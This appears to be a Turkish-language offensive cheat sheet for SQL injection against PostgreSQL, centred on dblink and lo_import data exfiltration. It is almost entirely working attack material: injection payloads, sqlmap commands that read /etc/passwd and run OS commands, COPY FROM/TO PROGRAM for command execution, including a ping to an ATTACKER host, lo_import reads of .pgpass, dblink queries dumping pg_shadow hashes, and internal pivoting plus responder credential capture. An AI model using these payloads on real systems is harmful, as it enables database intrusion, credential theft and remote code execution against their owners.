Skip to content

dblink/lo_import data exfiltration

web sqli

dblink/lo_import data exfiltration SQL/Cypher sorgusuna kullanıcı girdisinin birleşmesiyle oluşur. Amaç: DBMS fingerprint, veri sızıntısı ve mümkünse OS/RCE yükseltmesi.

  1. Enjekte edilebilir parametreyi (GET/POST/JSON/header/cookie) izole et.

  2. Boolean/time/OAST ile DBMS ve tekniği doğrula.

  3. Veri okuma → dosya/OS komutuna yükselt.

  4. Kanıt paketle; pivot için credential çıkar.

' OR '1'='1
1' AND SLEEP(5)-- -
1' AND 1=CAST((SELECT version()) AS int)-- -
Terminal window
sqlmap -u 'https://TARGET/item?id=1' --batch --banner --current-user --current-db
Terminal window
ghauri -u 'https://TARGET/item?id=1' --dbs
1' UNION SELECT NULL,version(),current_user-- -
'; SELECT table_name FROM information_schema.tables-- -
Terminal window
sqlmap -u 'https://TARGET/item?id=1' -D public --tables --batch
Terminal window
sqlmap -u 'https://TARGET/item?id=1' --file-read=/etc/passwd --batch
CREATE TABLE cmd(data text); COPY cmd FROM PROGRAM 'id';
SELECT lo_import('/etc/passwd'); SELECT lo_get(loid);
CREATE EXTENSION IF NOT EXISTS dblink;
Terminal window
sqlmap -u 'https://TARGET/item?id=1' --os-cmd=id --batch
plpython/plperlu/pltclu dil uzantıları → os.system
SELECT * FROM dblink('host=127.0.0.1 dbname=postgres user=postgres password=x','select usename,passwd from pg_shadow') AS t(u text,p text);
SELECT lo_from_bytea(0, decode('...', 'hex')); SELECT lo_export(oid, '/tmp/x');
Terminal window
psql 'host=TARGET user=app dbname=app' -c '\du'
SELECT * FROM dblink_connect('host=INTERNAL port=445 user=x password=y dbname=x');
COPY (SELECT '') TO PROGRAM 'ping -c 1 ATTACKER';
Terminal window
responder -I tun0 -v
SELECT lo_import('/var/lib/postgresql/.pgpass');
SELECT encode(lo_get(loid),'escape');
Terminal window
psql -c "SELECT lo_export(1234, '/tmp/out')"

dblink/lo_import data exfiltration sonuçları hedef sürüme ve yığına göre değişir. Her başarılı adımı request/response ile kaydet; sonraki pivot’u not et.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
nuclei -u https://TARGET -as -silent
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt

Bu ekler keşif ve kanıt paketini hızlandırır; asıl sömürü üstteki bölümlerdeki konu-özel payload’larla yapılır.